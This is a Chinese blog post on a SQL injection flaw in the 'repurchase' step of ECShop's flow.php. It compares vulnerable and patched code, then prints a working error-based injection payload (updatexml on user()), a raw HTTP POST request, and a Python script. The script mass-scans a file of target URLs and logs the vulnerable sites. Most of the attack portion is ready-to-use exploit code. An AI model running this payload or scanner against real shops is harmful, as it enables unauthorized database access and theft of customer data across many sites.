摘要
关于这个漏洞是新版本修复了。下载了古老的版本对比才发现的。只是怎么也没有想到ecshop也会犯这种低级的错误。
好吧,文件flow.php
关于这个漏洞是新版本修复了。下载了古老的版本对比才发现的。只是怎么也没有想到ecshop也会犯这种低级的错误。
好吧,文件flow.php
elseif ($_REQUEST['step'] == 'repurchase') { include_once('includes/cls_json.php'); $order_id = strip_tags($_POST['order_id']); $order_id = json_str_iconv($order_id); $user_id = $_SESSION['user_id']; $json = new JSON; $order = $db->getOne('SELECT count(*) FROM ' . $ecs->table('order_info') . ' WHERE order_id = ' . $order_id . ' and user_id = ' . $user_id); if (!$order) { $result = array('error' => 1, 'message' => $_LANG['repurchase_fail']); die($json->encode($result)); } $db->query('DELETE FROM ' .$ecs->table('cart') . " WHERE rec_type = " . CART_REPURCHASE); $order_goods = $db->getAll("SELECT goods_id, goods_number, goods_attr_id, parent_id FROM " . $ecs->table('order_goods') . " WHERE order_id = " . $order_id); $result = array('error' => 0, 'message' => ''); foreach ($order_goods as $goods) { $spec = empty($goods['goods_attr_id']) ? array() : explode(',', $goods['goods_attr_id']); if (!addto_cart($goods['goods_id'], $goods['goods_number'], $spec, $goods['parent_id'], CART_REPURCHASE)) { $result = false; $result = array('error' => 1, 'message' => $_LANG['repurchase_fail']); } } die($json->encode($result)); }
这里的参数并非是新版的$order_id = intval($_POST['order_id']);
elseif ($_REQUEST['step'] == 'repurchase') { include_once('includes/cls_json.php'); $order_id = intval($_POST['order_id']); $order_id = json_str_iconv($order_id); $user_id = $_SESSION['user_id']; $json = new JSON; $order = $db->getOne('SELECT count(*) FROM ' . $ecs->table('order_info') . ' WHERE order_id = ' . $order_id . ' and user_id = ' . $user_id); if (!$order) { $result = array('error' => 1, 'message' => $_LANG['repurchase_fail']); die($json->encode($result)); } $db->query('DELETE FROM ' .$ecs->table('cart') . " WHERE rec_type = " . CART_REPURCHASE); $order_goods = $db->getAll("SELECT goods_id, goods_number, goods_attr_id, parent_id FROM " . $ecs->table('order_goods') . " WHERE order_id = " . $order_id); $result = array('error' => 0, 'message' => ''); foreach ($order_goods as $goods) { $spec = empty($goods['goods_attr_id']) ? array() : explode(',', $goods['goods_attr_id']); if (!addto_cart($goods['goods_id'], $goods['goods_number'], $spec, $goods['parent_id'], CART_REPURCHASE)) { $result = false; $result = array('error' => 1, 'message' => $_LANG['repurchase_fail']); } } die($json->encode($result)); }
继续查看json_str_iconv
function json_str_iconv($str) { if (EC_CHARSET != 'utf-8') { if (is_string($str)) { return addslashes(stripslashes(ecs_iconv('utf-8', EC_CHARSET, $str))); } elseif (is_array($str)) { foreach ($str as $key => $value) { $str[$key] = json_str_iconv($value); } return $str; } elseif (is_object($str)) { foreach ($str as $key => $value) { $str->$key = json_str_iconv($value); } return $str; } else { return $str; } } return $str; }
这里显然没过滤了 再看看上面的SQL语句 居然没有单引号包含 这样就能直接注射了
POST提交一下内容到 http://localhost/flow.php?step=repurchase
order_id=1 or updatexml(1,concat(0x7e,(user())),0) or 11#
一个post包
POST /flow.php?step=repurchase HTTP/1.1 Host:?127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Cookie: ECS[visit_times]=2; ECS_ID=1998571d464009d432a17951ee5852104eba8b75 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 11 order_id=1*
附上野生payload一枚
import requests as req import optparse def poc(url): xode='MySQL server error report:Array' url=url+'/flow.php' try: rgg=req.get(url) except: return '[-]Getting '+url+' Wrong' if rgg.status_code !=200: return '[-]'+url+' Wrong' geturl=url+'?step=repurchase' payload='order_id=1 or updatexml(1,concat(0x7e,(user())),0) or 11#' a=req.post(geturl,data=payload) if a.status_code==200: if xode in a.text: return 2 else: return '[-]'+url+'Exploiting Fail' else: return '[-]'+url+' Fail!!' def ifhttp(url): if 'http://' in url: return url else: return 'http://'+url def r(filename): try: ff= open(filename).readlines() except: print'[-] The file is not exist' exit(0) return ff def w(url): f=open('Res.txt','a+') f.write(url+'/n') f.close if __name__=='__main__': parser = optparse.OptionParser('usage%prog -u -r ') parser.add_option('-u', dest='url', type='string', help='the website') parser.add_option('-r', dest='file', type='string', help='the file') (options, args) = parser.parse_args() url = options.url f=options.file if options.url == None and f==None: print(parser.usage) exit(0) if options.url!=None: url=ifhttp(url) r=poc(url) if r==2: print '[+]'+url+' succeed' w(url) else: print r if f!=None: for fff in r(f): b=fff.strip('/n') r=poc(ifhttp(b)) if r==2: print '[+]'+b+' succeed' w(b) else: print r
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
